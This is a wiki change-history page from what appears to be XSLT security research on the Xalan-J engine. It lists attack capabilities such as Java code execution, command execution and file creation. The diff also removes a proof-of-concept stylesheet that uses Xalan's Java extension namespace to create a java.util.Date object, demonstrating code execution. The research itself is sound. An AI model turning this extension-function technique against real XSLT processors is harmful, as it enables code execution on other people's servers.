Changes for page Engine_XalanJ

Last modified by Nicolas Gregoire on 2012/01/31 17:35
From version Icon 45.1 Icon
edited by Nicolas Gregoire
on 2012/01/11 23:38
Change comment: Upload new attachment xalanj-java-date.xsl
To version Icon 39.1 Icon
edited by Nicolas Gregoire
on 2012/01/11 23:28
Change comment: There is no comment for this version

Summary

Details

Icon Page properties
Content
... ... @@ -22,7 +22,7 @@
22 22  * Java properties disclosure
23 23  * Java environment disclosure
24 24  * Java code execution
25 -* OS command execution
25 +* Arbitrary command execution
26 26  * File creation
27 27  * JDBC connectivity
28 28  
... ... @@ -44,11 +44,12 @@
44 44  
45 45  The attached code will display the current date using a newly created "java.util.Date" object. This should be enough to demonstrate Java code execution.
46 46  
47 +
47 47  |=Namespace|=Extension function|=PoC|=Sample output
48 48  |http:~/~/xml.apache.org/xalan/java/java.util.Date|new()|[[xalanj-java-date.xsl>>attach:xalanj-java-date.xsl]]|Current date:
49 49  Wed Jan 11 22:45:07 CET 2012
50 50  
51 -== OS command execution ==
52 +== Execution of external commands ==
52 52  
53 53  The following code will execute the command "touch /tmp/hello" :
54 54  
Icon xalanj-java-date.xsl
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,1 +1,0 @@
1 -409 bytes
Content
... ... @@ -1,11 +1,0 @@
1 -<xsl:stylesheet version="1.0"
2 - xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
3 - xmlns:date="http://xml.apache.org/xalan/java/java.util.Date"
4 - exclude-result-prefixes="date">
5 - <xsl:output method="text"/>
6 - <xsl:template match="/">
7 - <xsl:variable name="dateObject" select="date:new()"/>
8 - <xsl:text>Current date: </xsl:text><xsl:value-of select="$dateObject"/>
9 - </xsl:template>
10 -</xsl:stylesheet>
11 -